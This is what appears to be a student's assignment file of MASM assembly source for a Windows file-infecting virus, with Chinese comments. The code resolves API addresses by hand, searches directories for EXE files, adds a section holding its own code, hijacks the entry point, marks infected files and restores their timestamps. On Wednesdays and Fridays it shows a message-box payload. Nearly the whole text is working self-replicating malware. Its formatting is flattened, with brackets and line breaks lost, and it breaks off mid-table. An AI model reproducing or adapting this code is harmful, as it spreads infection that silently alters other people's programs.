immunity代码(柴婷婷).docx

.386.model flat,stdcalloption casemap:noneinclude masm32includewindows.incinclude masm32includekernel32.incinclude masm32includeuser32.incincludelib masm32libkernel32.libincludelib masm32libuser32.lib;这是一些相关的定义，;-(上面的)-.datamcaption db 你好!1!,0mtitle db *标题*,0; 主程序所用到的一些变量;-(上面的)-.codehost_start:invoke MessageBox,NULL,offset mcaption,offset mtitle,64invoke ExitProcess,0;主程序代码，只是简单的打一串字符而已。;病毒代码运行完后，就会跳到此处执行。;-(上面的)-Immunity SEGMENT PARA USE32 Immunityassume cs:Immunity,ds:Immunityvstart:push ebppush espcall nstartnstart: ;pop ebpsub ebp,offset nstart;病毒中常用的一种方法。得到一个偏移差。;程序后面用到的所有变量都需要加上个这偏移差;-(上面的)-assume fs:nothing ;设置SEH,发生异常可以直接返回原入口.lea ebx, SEHebppush ebxpush fs:0mov fs:0,espmov OldEspebp,esp;=; * 更改程序入口地址 *cmp old_baseebp,0jnz gonextmov old_baseebp,400000hgonext:cmp old_inebp,0jnz changemov old_inebp,1000hchange:mov eax,old_baseebpmov des_baseebp,eaxmov eax, old_inebpmov des_inebp,eax;变量定义的的意思见后方;程序开始执行时，当前程序的原入口地址会放到old_base+old_in中;由于程序中old_base_in有别的用途，因此将此地址存放到;des_base_in，以便最后跳回原程序入口。;-(上面的)-;获得KERNEL32地址及所需的API函数地址mov eax,esp+10h ;/取Kernel32返回地址and ax,0f000hmov esi,eax ;/得到Kernel.PELoader代码位置(不精确)LoopFindKernel32: sub esi,1000h cmp word ptresi,ZM ;/搜索EXE文件头 jnz short LoopFindKernel32GetPeHeader: movzx edi,word ptresi+3ch add edi,esi cmp word ptredi,EP ;/确认是否PE文件头 jnz short LoopFindKernel32 ;esi-kernel32,edi-kernel32 PE HEADER ;/查找GetProcAddress函数地址 mov vKernel32ebp,esiGetPeExportTable: mov ebx,edi+78h;4+14h+60h add ebx,vKernel32ebp ;/得到输出函数表 mov vExportKernelebp,ebx push 14 call aGetProcAddr db GetProcAddress,0aGetProcAddr: lea eax,GetApiAddressebp call eax or eax,eax jz ExitTimes mov vGetProcAddressebp,eax ;得到GetProcAddress地址 lea esi,bGetModuleHandleebp ;获得所有用到的KERNEL32函数的地址 lea edi,vGetModuleHandleebp cldComeOn: lodsd add eax,ebp push eax push vKernel32ebp call dword ptr vGetProcAddressebp or eax,eax jz ExitTimes stosd cmp dword ptresi,0 jnz ComeOncall UserDll1db User32.dll,0UserDll1:call dword ptr vGetModuleHandleebpor eax,eaxjnz Rightcall UserDll2db User32.dll,0UserDll2:call dword ptr vLoadLibraryebpor eax,eaxjz ExitTimes ;获得USER32.DLL地址Right:call GetMessdb MessageBoxA,0GetMess:push eaxcall dword ptr vGetProcAddressebpor eax,eaxjz ExitTimesmov vMessageBoxebp,eax ;获得MESSAGEBOX地址;-;目录的开头部份lea eax,NowPathebppush eaxmov eax,256push eaxcall vGetCurrentDirectoryebp ;成功返回写入字节数,失败返回0test eax,eaxjz ExitTimes;通过API函数得到当前程序所在目录;-(上面的)-lea eax,NowPathebppush eaxlea eax,SrcDirebppush eaxcall vlstrcpyebptest eax,eaxjz ExitTimes;保存当前目录;-(上面的)-mov NowPathNoebp,1FindStartT:cmp NowPathNoebp,1jz GFindFtcmp NowPathNoebp,2jz GetWinDcmp NowPathNoebp,3jz GetSysDjmp AllFindEnd ;根据NowPathNor值来判断感染哪个目录的文件;-(上面的)-GetWinD: mov eax,256push eaxlea eax,NowPathebppush eaxcall vGetWindowsDirectoryebptest eax,eaxjz ExitTimeslea eax,NowPathebppush eaxcall vSetCurrentDirectoryebptest eax,eaxjz ExitTimesjmp GFindFt;得到WINDOWS所在目录，并且将其设为当前目录;-(上面的)-GetSysD:mov eax,256push eaxlea eax,NowPathebppush eaxcall vGetSystemDirectoryebptest eax,eaxjz ExitTimeslea eax,NowPathebppush eaxcall vSetCurrentDirectoryebptest eax,eaxjz ExitTimes;得到SYSTEM所在目录，并且将其设为当前目录;-(上面的)-GFindFt:lea eax,FindDataebppush eaxlea eax,FileFilterebppush eaxcall vFindFirstFileebpcmp eax,INVALID_HANDLE_VALUEjz FindEndsmov hFindebp,eax;查找当前目录下的第一个EXE文件;-(上面的)-GoOnFind :;获得文件的属性,确保文件可以被打开lea eax,FindDataebp.cFileNamepush eaxcall vGetFileAttributesebpcmp eax,-1jz EndDirmov OldAttributeebp,eaxtest eax,1jz Openand eax,0fffffffehpush eaxlea eax,FindDataebp.cFileNamepush eaxcall vSetFileAttributesebpcmp eax,-1jz EndDirOpen: ;以下是病毒传染部份;-push 0push FILE_ATTRIBUTE_NORMALpush OPEN_EXISTINGpush 0push FILE_SHARE_READ+FILE_SHARE_WRITEpush GENERIC_READ+GENERIC_WRITElea eax,FindDataebp.cFileNamepush eaxcall vCreateFileebpcmp eax,INVALID_HANDLE_VALUEjz EndDirmov hFileebp,eax;打开文件;-(上面的)-lea eax, LastWriteTimeebppush eaxlea eax, LastAccessTimeebppush eaxlea eax, CreationTimeebppush eaxpush hFileebpcall vGetFileTimeebptest eax,eaxjz CloseFile1;保存原来文件修改时间push 0 push 0 push 0 push PAGE_READWRITE push NULL push hFileebp call vCreateFileMappingebp or eax,eaxjz CloseFilemov hMappingebp, eax push 0 push 0 push 0 push FILE_MAP_READ+FILE_MAP_WRITE push hMappingebp call vMapViewOfFileebpor eax,eaxjz CloseMapmov pMappingebp, eax;判断感染条件:1,是否PE.2:是否已感染.3:是否有足够的空间.4:WINZIP自解压文件mov ebx, eax assume ebx :ptr IMAGE_DOS_HEADER mov eax,ebx.e_lfanewtest eax,0fffff000hjnz EndDir ;Header+stub不可能太大,超过4096byte mov pe_header_offebp,eaxadd ebx,eax ;此时ebx指向PE文件头assume ebx:ptr IMAGE_NT_HEADERS cmp ebx.Signature,IMAGE_NT_SIGNATURE ;是PE文件吗？jnz UnMap cmp word ptrebx+1ah,FB ;是否已经感染 jz UnMap;* ;指向第二个节判断是否是WinZip自解压文件;是就不感染;*mov eax,ebxadd eax,18h ;PE HEADER(4)+FILEHEADER(14)movzx esi,ebx.FileHeader.SizeOfOptionalHeader add eax,esi ;eax指向第1个节表assume eax:ptr IMAGE_SECTION_HEADERmov edx,eax.PointerToRawDataadd edx,ebxsub edx,pe_header_offebpsub edx,4cmp dword ptredx,0jnz UnMapadd eax,28h ;eax指向第2个节表mov edx,eaxassume edx:ptr IMAGE_SECTION_HEADERmov eax,edx.PointerToRawDataadd eax,ebxsub eax,pe_header_offebpadd eax,12h ;加10h+2h(10h处为WinZip.)cmp dword ptr eax, piZnjz UnMappush ebx.OptionalHeader.FileAlignmentpop FileAlignebp;* ;判断是否有足够空间存储新节 ;28h=sizeof IMAGE_SECTION_HEADER ,18h=sizeof IMAGE_FILE_HEADER;edi将指向新节 ;* movzx eax,ebx.FileHeader.NumberOfSections ;文件的节数mov ecx,28hmul ecx add eax,pe_header_offebpadd eax,18h movzx esi,ebx.FileHeader.SizeOfOptionalHeader add eax,esimov NewSection_offebp,eax ;保存新节起始RVAadd eax,28h ;比较增加新节后是否超出SizeOfHeaders(节.TEXT在文件中的RVA)cmp eax,ebx.OptionalHeader.SizeOfHeaders ja Infest ;即使没有添加空间还是可以免疫push pMappingebp ;关闭映射文件,然后从新生成新的映射文件call vUnMapViewOfFileebp ;并将映射文件的空间增加4K以便加入病毒代码push hMappingebp call vCloseHandleebp push 0push hFileebpcall vGetFileSizeebp ;get file sizecmp eax,INVALID_HANDLE_VALUEjz CloseFilemov ecx,FileAlignebpxor edx,edxdiv ecxtest edx,edxjz NoChangeinc eax NoChange:mul ecx mov fsizeebp,eax;文件尺寸节文件对齐add eax,1000h push 0 push eax push 0 push PAGE_READWRITE push NULL push hFileebp call vCreateFileMappingebp or eax,eaxjz CloseFilemov hMappingebp, eax push 0 push 0 push 0 push FILE_MAP_READ+FILE_MAP_WRITE push hMappingebp call vMapViewOfFileebpor eax,eaxjz CloseMapmov pMappingebp, eaxmov ebx,eaxadd ebx,pe_header_offebp ;此时ebx指向PE文件头assume ebx:ptr IMAGE_NT_HEADERSNoinfect: ;保存原入口 mov eax,ebx. OptionalHeader.AddressOfEntryPoint mov old_inebp,eax mov eax, ebx.OptionalHeader.ImageBase mov old_baseebp,eax mov edi,NewSection_offebp ;新节的RVAadd edi,pMappingebp ;edi-新节起始地址;*;空间允许, 0,开始插入新节并填充各字段 ;esi指向原文件最后一个节，利用它来填充新节某些字段;* inc ebx.FileHeader.NumberOfSections ;节数目+1mov esi,edi ;edi指向新节sub esi,28h ;esi指向上一个节assume edi:ptr IMAGE_SECTION_HEADER assume esi:ptr IMAGE_SECTION_HEADER mov edi.Name1,41h ;随便为新节命名，使之不等于0push ebx.OptionalHeader.SizeOfImage ;原文件映像装入内存后的总尺寸,对齐SectionAlignment.pop edi.VirtualAddress ;新节在内存中的地址mov eax,offset vend-offset vstartmov edi.Misc.VirtualSize,eax ;新节的大小(未对齐)mov ecx,ebx.OptionalHeader.FileAlignmentxor edx,edxdiv ecxtest edx,edxjz NoChange1inc eax NoChange1:mul ecxmov edi.SizeOfRawData,eax ;新节对齐FileAligment后的大小mov eax,fsizeebpmov edi.PointerToRawData,eax ;本节在文件中的位置mov edi.Characteristics,0E0000020h ;可读可写可执行 ;* ;更新SizeOfImage,AddressOfEntryPoint,使新节可以正确加载并首先执行 ;*mov eax,edi.Misc.VirtualSize ;新节的大小(未对齐)mov ecx,ebx.OptionalHeader.SectionAlignment ;内存节对齐xor edx,edxdiv ecxtest edx,edxjz NoChange2inc eax NoChange2:mul ecx add eax,ebx.OptionalHeader.SizeOfImage;对齐后大小+原文件映像装入内存后的总尺寸,对齐SectionAlignment.mov ebx.OptionalHeader.SizeOfImage,eax ;更新后的文件映像装入内存后的总尺寸,对齐SectionAlignment.mov eax,edi.VirtualAddress ;新节在内存中的地址写入入口点mov ebx.OptionalHeader.AddressOfEntryPoint,eax mov word ptr ebx+1ah,FB ;写入感染标志 mov edi,pMappingebpadd edi,fsizeebplea esi,vstartebpmov ecx,offset vend-offset vstartcldrep movsb ;将病毒代码写入映射的内存中(在原文件之后);*;乾坤大挪移，将节表移到PE头的最后;*mov edi,ebx.OptionalHeader.SizeOfHeadersadd edi,ebx sub edi,pe_header_offebp;edi-文件中的第一个节dec edi ;edi-PE头的最后一个字节mov esi,ebxadd esi,18h ;PE HEADER(4)+FILEHEADER(14)movzx eax,ebx.FileHeader.SizeOfOptionalHeader add esi,eax ;esi指向第1个节表movzx ecx,ebx.FileHeader.NumberOfSectionsimul ecx,ecx,28hadd esi,ecxdec esi ;esi-最后一个节的最后一个字节stdrep movsb ;乾坤大挪移sub edi,ebx sub edi,18hinc edimov word ptrebx.FileHeader.SizeOfOptionalHeader,di;更新可选头大小;*;退出前进行节空间填塞免疫，edi-First Section Table,ecx=NumberOfSections;*Infest:mov edi,ebxadd edi,18h ;PE HEADER(4)+FILEHEADER(14)movzx esi,ebx.FileHeader.SizeOfOptionalHeader add edi,esi ;edi指向第1个节表movzx ecx,ebx.FileHeader.NumberOfSectionsSectionInfest:assume edi:ptr IMAGE_SECTION_HEADERmov eax,edi.SizeOfRawData;文件对齐后节的大小cmp eax,edi.Misc.VirtualSize ;节的大小(未对齐)jb NextSectionmov edi.Misc.VirtualSize,eaxNextSection:add edi,28hloop SectionInfestUnMap:push pMappingebp call vUnMapViewOfFileebpCloseMap:push hMappingebp call vCloseHandle ebpCloseFile:lea eax, LastWriteTimeebppush eaxlea eax, LastAccessTimeebppush eaxlea eax, CreationTimeebppush eaxpush hFileebpcall vSetFileTimeebpCloseFile1:push hFileebp call vCloseHandle ebpmov eax,OldAttributeebptest eax,1 ;是否需要恢复文件属性(有写属性就不需要恢复了)jz EndDirpush eaxlea eax,FindDataebp.cFileNamepush eaxcall vSetFileAttributesebp ;恢复原来文件属性;-;目录结尾区 EndDir:lea eax,FindDataebppush eaxpush hFindebpcall vFindNextFileebpcmp eax,0jnz GoOnFind ;查找下一个文件，然后继续感染，直到全感染全为止;-(上面的)-FindEnds:push hFindebpcall vFindCloseebpmov NowPathNoebp,4;inc NowPathNoebp;inc NowPathNoebp ; 多加了几个1;inc NowPathNoebp ;inc NowPathNoebp ;jmp FindStartT;为了调试方便，在此只感染当前目录;-(上面的)-AllFindEnd:lea eax,SrcDirebppush eaxcall vSetCurrentDirectoryebp;恢复当前目录;-(上面的)-;# 病毒发作区 #; lea eax,NowTimesebppush eaxcall vGetSystemTimeebpcmp NowTimesebp.wDayOfWeek,0003hjz InTimescmp NowTimesebp.wDayOfWeek,0005hjnz ExitTimes;根据时间决定，每周星期三和星期五发作;-(上面的)-;- 发作代码 -InTimes:;-push 0lea eax,MyTitleebppush eaxlea eax,MyTalkebppush eaxpush 0call vMessageBoxebp;显示一个提示窗口;-(上面的)-ExitTimes:;#; 恢复寄存器，跳回原程序处 ;-pop fs:0add esp,4mov eax,des_baseebpadd eax,des_inebppop esppop ebppush eaxret;-;返回主程序GetApiAddress proc AddressOfName:dword,ApiLength:byte push ebx push esi push edi call TmpTmp: pop edx sub edx,offset Tmp mov edi,vExportKerneledx assume edi:ptr IMAGE_EXPORT_DIRECTORY GetExportNameList: mov ebx,edi.AddressOfNames ;/得到输出函数名表 add ebx,vKernel32edx ;ebx-AddressOfNames(函数名字的指针地址). xor eax,eax ;/函数序号计数 mov edx,vKernel32edx ;/暂存Kernel32模块句柄;edx-kernel32 push edi ;保存EDILoopFindApiStr: add ebx,04 inc eax ;/增加函数计数 mov edi,dword ptrebx add edi,edx ;/得到一个Api函数名字符串.edi-函数名 StrGetProcAddress: mov esi,AddressOfName ;/得到Api名字字符串 cmpsd;比较前4个字符是否相等 jnz short LoopFindApiStr ;eax=函数名的INDEX xor ecx,ecx mov cl, ApiLength sub cl,4 ;/比较剩余的GetProcAddress串 cldGoon: cmpsb jnz short LoopFindApiStr ;eax=函数名的INDEX loop Goon pop edi ;恢复EDI mov esi,edx mov ebx,edi.AddressOfNameOrdinals add ebx,esi ;/取函数序号地址列表,ebx-AddresssOfNameOrdinals movzx ecx,word ptr ebx+eax*2 mov ebx,edi.AddressOfFunctions add ebx,esi ;/得到Kernel32函数地址列表 mov ebx,dword ptrebx+ecx*4 add ebx,esi ;/计算GetProcAddress函数地址 mov eax,ebx ;eax=API函数地址,esi=Kernel32.dll hModule pop edi pop esi pop ebx retGetApiAddress endp SEH PROC C pExcept:DWORD,pFrame:DWORD,pContext:DWORD,pDispatch:DWORD call NextNext: pop ebxsub ebx,offset Nextassume edi:ptr CONTEXT assume esi:ptr EXCEPTION_RECORD mov esi,pExcept mov edi,pContext test dword ptresi+4,1 ;Exception flags jnz f test dword ptresi+4,6 jnz f mov eax,OldEspebxmov edi.regEsp,eax ;恢复ESP lea eax,ExitTimesebxmov edi.regEip,eax ;mov eax,0 ret : mov eax,1 retSEH ENDP;-; 函数调用地址;-vKernel32 dd 0vExportKernel dd 0vGetProcAddress dd 0vGetModuleHandle dd 0vLoadLibrary dd 0vCreateFile dd 0 vGetFileSize dd 0vCreateFileMapping dd 0 vMapViewOfFile dd 0 vUnMapViewOfFile dd 0 vCloseHandle dd 0vGetCurrentDirectory dd 0 vGetWindowsDirectory dd 0 vGetSystemDirectory dd 0 vSetCurrentDirectory dd 0vlstrcpy dd 0vFindFirstFile dd 0 vFindNextFile dd 0 vFindClose dd 0 vGetSystemTime dd 0 vExitProcess dd 0vGetFileAttributes dd 0vSetFileAttributes dd 0vGetFileTime dd 0vSetFileTime dd 0vMessageBox dd 0bGetModuleHandle dd offset sGetModuleHandlebLoadLibrary dd offset sLoadLibrarybCreateFile dd offset sCreateFilebGetFileSize dd offset sGetFileSizebCreateFileMapping dd offset sCreateFileMapping bMapViewOfFile dd offset sMapViewOfFile bUnMapViewOfFile dd offset sUnMapViewOfFile bCloseHandle dd offset sCloseHandlebGetCurrentDirectory dd offset sGetCurrentDirectory bGetWindowsDirectory dd offset sGetWindowsDirectory bGetSystemDirectory dd offset sGetSystemDirectory bSetCurrentDirectory dd offset sSetCurrentDirectoryblstrcpy dd offset slstrcpy bFindFirstFile dd offset sFindFirstFilebFindNextFile dd offset sFindNextFile bFindClose dd offset sFindClose bGetSystemTime dd offset sGetSystemTimebExitProcess dd offset sExitProcessbGetFileAttributes dd offset sGetFileAttributesbSetFileAttributes dd offset sSetFileAttributesbGetFileTime dd off